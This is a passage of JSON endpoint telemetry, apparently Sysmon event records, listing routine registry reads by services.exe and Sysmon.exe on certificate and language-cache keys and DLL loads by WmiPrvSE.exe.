"C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - 
"timestamp": 131883570847930000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "regapi.dll", - "image_path": "C:\\Windows\\System32\\regapi.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - 
"event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 
131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848080000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848080000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570847610000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": 
"CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 
